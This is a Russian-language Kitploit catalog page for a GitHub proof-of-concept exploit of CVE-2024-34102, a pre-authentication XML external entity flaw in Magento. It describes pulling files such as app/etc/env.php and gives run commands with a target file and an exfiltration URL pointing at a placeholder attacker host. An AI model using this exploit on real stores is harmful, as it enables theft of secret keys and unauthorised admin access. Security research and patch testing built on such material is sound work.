Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34102 — Демонстрация PoC , критическая уязвимость внедрения XML-сущностей в Magento | Kitploit
Инструменты/GitHubGitHub/d0rb/cve-2024-34102
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubd0rb/cve-2024-34102

CVE-2024-34102

Демонстрация PoC , критическая уязвимость внедрения XML-сущностей в Magento

Репозиторий
222 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

Мы требуем безопасного возвращения всех граждан, взятых в заложники террористической группировкой ХАМАС. Мы не успокоимся, пока каждый заложник не будет освобождён и не вернётся домой в безопасности. Вы можете помочь вернуть их домой. https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

Этот репозиторий содержит эксплойт (proof-of-concept) для критической уязвимости внедрения XML-сущностей (CVE-2024-34102) в Magento. Эта уязвимость позволяет извлекать конфиденциальные файлы, которые затем могут быть использованы для получения несанкционированного доступа к административным функциям Magento. Данный эксплойт предназначен для образовательных целей и должен использоваться ответственно.

Обзор 📖

Magento — одно из самых популярных решений для электронной коммерции, используемых по всему миру. В июне 2024 года была обнаружена критическая уязвимость внедрения XML-сущностей до аутентификации, идентифицированная как CVE-2024-34102. Эта уязвимость может привести к серьёзным последствиям, включая извлечение файла app/etc/env.php из Magento, который содержит криптографические ключи, используемые для подписи JWT.

Возможности 🌟

  • Извлечение конфиденциальных файлов из уязвимого экземпляра Magento.
  • Простое и понятное использование.
  • Образовательная демонстрация внедрения XML-сущностей.

Использование 🚀

Предварительные требования

  • Python 3.x
  • Библиотека requests (pip install requests)

Запуск эксплойта

  1. Клонируйте репозиторий:

    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. Выполните скрипт с необходимыми аргументами:

    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

Аргументы командной строки

  • --target-url: URL целевого экземпляра Magento.
  • --target-file: Путь к файлу на целевом сервере для извлечения.
  • --exfil-url: URL для приёма извлечённых данных.

Пример 🌐

python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
Скачать инструмент